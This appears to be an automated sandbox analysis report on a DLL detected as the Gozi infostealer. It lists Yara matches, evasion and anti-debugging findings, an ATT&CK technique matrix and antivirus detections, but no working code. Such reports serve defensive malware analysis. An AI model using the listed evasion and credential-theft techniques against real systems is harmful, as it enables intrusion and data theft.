Source: Yara match, file source: 3.0.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.loaddll32.exe.9e0000.3.unpack, type: UNPACKEDPE
Source: Yara match, file source: 3.0.rundll32.exe.1080000.7.unpack, type: UNPACKEDPE
Source: Yara match, file source: 3.0.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
Source: Yara match, file source: 3.0.rundll32.exe.ed0184.5.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 3.2.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.loaddll32.exe.9e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.loaddll32.exe.2500000.4.unpack, type: UNPACKEDPE
Source: Yara match, file source: 3.2.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.loaddll32.exe.890184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 3.0.rundll32.exe.1080000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 3.0.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.loaddll32.exe.2a094a0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.loaddll32.exe.8a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.loaddll32.exe.2a094a0.5.unpack, type: UNPACKEDPE
Source: Yara match, file source: 3.0.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 00000000.00000002.777601117.0000000002A09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000000.253570198.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000000.253536439.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000002.315692460.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.776718826.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.776603802.0000000000890000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000000.254119232.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000000.253543214.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.776641923.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000000.254127070.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000000.254160040.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000002.315717603.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00721174 IsIconic, 0_2_00721174
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E37170 IsIconic,GetWindowPlacement,GetWindowRect, 3_2_00E37170
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E5D24C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 3_2_00E5D24C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0072921C CreatePopupMenu,MITGetCursorUpdateHandle,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetDebugErrorLevel,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,DialogBoxParamW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,DialogBoxIndirectParamW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,MITUpdateInputGlobals,0_2_0072921C
Source: C:\Windows\SysWOW64\WerFault.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: NtQuerySystemInformation, DecisionNodes, Sleep graph_3-18255
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072C54C 0_2_0072C54C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E3C54C 3_2_00E3C54C
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 1014
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 432
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 1247
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 805
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 867
Source: C:\Windows\System32\loaddll32.exe Window / User API: threadDelayed 964
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072C54C 0_2_0072C54C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E3C54C 3_2_00E3C54C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0072165C GetSystemInfo, 0_2_0072165C
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_007053C4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 0_2_007053C4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E153C4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 3_2_00E153C4
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node graph_3-18577
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node graph_3-18940
Source: Amcache.hve.7.dr Binary or memory string: VMware
Source: Amcache.hve.7.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.7.dr Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual USB Mouse
Source: loaddll32.exe, 00000000.00000002.777216026.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.750161784.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.772918664.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.438919060.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWve MAC Layer LightWeight Filter-0000
Source: Amcache.hve.7.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.7.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr Binary or memory string: VMware7,1
Source: Amcache.hve.7.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.7.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: loaddll32.exe, 00000000.00000002.777216026.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.439117348.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.750161784.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.750087069.0000000000A8E000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.772918664.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.438919060.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.776884531.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000007.00000002.314927336.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000007.00000003.312790180.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000007.00000003.312588018.0000000004A62000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.7.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr Binary or memory string: VMware, Inc.me
Source: Amcache.hve.7.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.7.dr Binary or memory string: VMware-42 35 bb 32 33 75 d2 27-52 00 3c e2 4b d4 32 71
Source: Amcache.hve.7.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Note: Amcache.hve.7.dr is the analysis machine's own Amcache registry hive, recorded as written by WerFault.exe (process 7) while it handled the crash. The VMware and Hyper-V strings it contains are the sandbox VM's hardware inventory (BIOS vendor, virtual disk and CD-ROM device IDs, VM UUID), not strings from the sample, so they show that the environment is virtualized rather than that the sample fingerprints virtualization. The only virtualization-related strings found inside a process that hosted the sample are the Hyper-V RAW entries in loaddll32.exe memory listed above.

                      Anti Debugging

Source: C:\Windows\SysWOW64\rundll32.exe Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep graph_3-18255
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0072921C CreatePopupMenu,MITGetCursorUpdateHandle,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetDebugErrorLevel,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,DialogBoxParamW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,DialogBoxIndirectParamW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,MITUpdateInputGlobals,0_2_0072921C
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
Source: C:\Windows\System32\loaddll32.exe Memory protected: page write copy | page execute and write copy | page guard
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1
Source: C:\Windows\System32\loaddll32.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 0_2_0070557C
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoA,GetACP, 0_2_0070C804
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoA, 0_2_0070B148
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoA, 0_2_0070B194
Source: C:\Windows\System32\loaddll32.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 0_2_00705688
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 3_2_00E1557C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 3_2_00E1B194
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 3_2_00E1B148
Source: C:\Windows\SysWOW64\rundll32.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 3_2_00E15688
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,GetACP, 3_2_00E1C804
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 3_2_00E15E74
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E19C14 GetLocalTime, 3_2_00E19C14
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0070C10C GetVersionExA, 0_2_0070C10C
Source: Amcache.hve.7.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe

                      Stealing of Sensitive Information

Source: Yara match | File source: 00000000.00000003.481994883.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.302599061.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.302425761.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.302331542.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.302218181.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.302044791.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.301848056.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.302504649.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.301661083.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.777721996.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 988, type: MEMORYSTR
Source: Yara match | File source: 3.2.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.rundll32.exe.ee0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.9e0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.rundll32.exe.1080000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.rundll32.exe.ed0184.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.9e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.2500000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.890184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.rundll32.exe.1080000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.2a094a0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.8a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.2a094a0.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.777601117.0000000002A09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.253570198.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.253536439.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.315692460.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.776718826.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.776603802.0000000000890000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.254119232.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.253543214.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.776641923.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.254127070.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.254160040.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.315717603.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

Source: Yara match | File source: 00000000.00000003.481994883.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.302599061.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.302425761.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.302331542.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.302218181.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.302044791.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.301848056.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.302504649.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.301661083.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.777721996.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 988, type: MEMORYSTR
Source: Yara match | File source: 3.2.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.rundll32.exe.ee0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.9e0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.rundll32.exe.1080000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.rundll32.exe.ed0184.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.9e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.2500000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.890184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.rundll32.exe.1080000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.2a094a0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.8a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.2a094a0.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.777601117.0000000002A09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.253570198.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.253536439.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.315692460.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.776718826.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.776603802.0000000000890000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.254119232.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.253543214.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.776641923.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.254127070.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.254160040.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.315717603.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

MITRE ATT&CK Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | 2 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 31 Input Capture | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 3 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot
Default Accounts | 11 Native API | Boot or Logon Initialization Scripts | 11 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 File and Directory Discovery | Remote Desktop Protocol | 1 Screen Capture | Exfiltration Over Bluetooth | 1 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 2 Obfuscated Files or Information | Security Account Manager | 116 System Information Discovery | SMB/Windows Admin Shares | 31 Input Capture | Automated Exfiltration | 3 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Software Packing | NTDS | 1 Query Registry | Distributed Component Object Model | 1 Clipboard Data | Scheduled Transfer | 13 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 231 Security Software Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 11 Virtualization/Sandbox Evasion | Cached Domain Credentials | 11 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | 11 Process Injection | DCSync | 11 Application Window Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Rundll32 | Proc Filesystem | 1 Remote System Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Source | Detection | Scanner | Label
hFGZpat9Mf.dll | 21% | Virustotal |
hFGZpat9Mf.dll | 33% | ReversingLabs | Win32.Infostealer.Gozi
hFGZpat9Mf.dll | 100% | Joe Sandbox ML |

No Antivirus matches

Source | Detection | Scanner | Label
3.0.rundll32.exe.1080000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8
0.2.loaddll32.exe.890184.1.unpack | 100% | Avira | TR/Kazy.4159236
3.2.rundll32.exe.e10000.0.unpack | 100% | Avira | HEUR/AGEN.1108767
3.0.rundll32.exe.ed0184.5.unpack | 100% | Avira | TR/Kazy.4159236
0.2.loaddll32.exe.2500000.4.unpack | 100% | Avira | HEUR/AGEN.1108168
